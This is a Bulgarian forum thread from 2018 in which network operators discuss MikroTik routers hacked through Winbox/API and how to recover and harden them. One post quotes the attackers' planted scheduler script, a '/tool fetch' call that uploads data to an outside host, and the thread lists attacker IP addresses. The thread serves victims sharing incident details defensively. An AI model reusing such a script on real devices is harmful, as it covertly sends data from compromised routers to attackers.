Хакнат микротик

[px1]

Здравейте, Хакнаха ми един mikrotik L4 на X86 платформа.

Беше ограничен за достъп само от 5 IP адреса и със спрени всички сървиси осен API и WINBOX

Има ли начин да се преинсталира флашката за да се запази лиценза ?

 

[stel]

С коя версия беше?

[111111]

С нетинстал би трябвало да се запази ключа
ако не е най наложителната машина пиши на support@mikrotik.com 
дано намерят какво по дяволите правят гадовете

 

п.с

И на последната го лекуват гадовете вече влизам само през ROMON
в Scheduler се появява някаква задача "а" която изпълнява скрипт с име "ip"
със следното съдържание:
 

{/tool fetch url=("http://www.boss-ip.com/Core/Update.ashx\?key=5bcжжжжжжжжжbf27&action=upload&sncode=A5C1F569жжжжжжжжжA8ED4743AEC042B&dynamic=static")  keep-result=no}

админ акаунт и да няма се създава

включват се всички сървиси и им се махат ограниченията

https://forum.mikrotik.com/viewtopic.php?t=135762

[master]

Как става достъпа при положение, че е ограничен само от 5 адреса?

[px1]

Версията беше 6.42.5

Първоначално забелязах че че се появява PPTP сървис с име test и се появяваше маскарад на целя трафик и нов pool на DHCP и нови часни адреси.

Акаунта и паролите не бяха променени.

Веднага смених всички пароли и спрях сървисите освен API (заради Билинга) и WINBOX само от 5 IP адреса.

От петък сутринта вече нямам  достъп с акаунта си , но интернета на два от рутърите си върви , а на трети е спрял.

Третия е с бридж на два от портовете защото го ползвам и за суич.

Предполагам че хака се прави по някаква странна схема която чупи моята конфигурация на този рутър.

Утре ще купя нов CCR  и GR3 за да може после  netinstall да изтрия старите рутъри.

Предполагам чупят линукса и си оставят врата .

Редактирано 22 Юли, 2018 от px1

[JohnTRIVOLTA]

Преди 3 часа, master написа:

Как става достъпа при положение, че е ограничен само от 5 адреса?

Мисля проблема е в ползването на non-ssl API , а и по-добре след такъв пробив да се ползва последен бекъп, като му се сменят всички пароли и  се затвърди стената, чрез смяна на портове, динамични блек листи за брутфорс и сканери, уайт листи за достъп и т.н. преди да се подвърже към публичното пространство!

[master]

От години не се беше случвало да видя в лога IP адреси който са се опитвали да се конектнат. На един от микротиците за 24 часа са се опитвали тези :

195.43.95.9о
185.2о9.0.12
5.188.4о.99
5.188.4о.100
138.68.51.1о7
77.72.83.11едно

 

[px1]

Тука е описна проблема

https://forum.mikrotik.com/viewtopic.php?f=2&t=135774

и е масов

[kokaracha]

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

[111111]

Преди 10 часа, kokaracha написа:

Достъп  от 5 адреса за всичко или само за изброените услуги ?

А  от кой адрес са се логнали първия път ?

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

[Fibernet]

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Редактирано 24 Юли, 2018 от Fibernet

[kokaracha]

Преди 11 часа, 111111 написа:

Няма лог за първия път защото по някакъв начин теглят базата с поребителите

 

Няма много начини за това. Или са имали данните и достъп или ограничението по адреси не работи или не е конфигнато правилно ( локанли мрежи ?).

[111111]

Преди 9 часа, Fibernet написа:

Исто и кај мене хакнат един от два МТ ccr. Само winbox port е дозволен.

Точно през този порт става атаката.

[msboy]

Явно Микротик го закъсаха относно сигурност. По неофициална информация знам че изпращането на файлове с вградения модул за изпращане на мейли също е бил компроментиран. Явно е въпрос на време да изпищят още хора. 

[px1]

Здравейте,

преинсталирах си флашката без да губя лиценза използвайки описанието на MIKOROTIK

https://forum.mikrotik.com/viewtopic.php?t=86528

По въпроса с пробива прилагам преинсталация с netinstall , смяна на портовете и паролите и филтрация на портовете още във входящия рутър.

Ще изчакам няколко дни да видя има ли ефект.

 

[kokaracha]

Изглеждат глупаво  тези мерки щом  има проблем със сигурноста на самата система. По добре някакъв тунел с адмиснистративна */29 мрежа примерно би било доста по сигурно.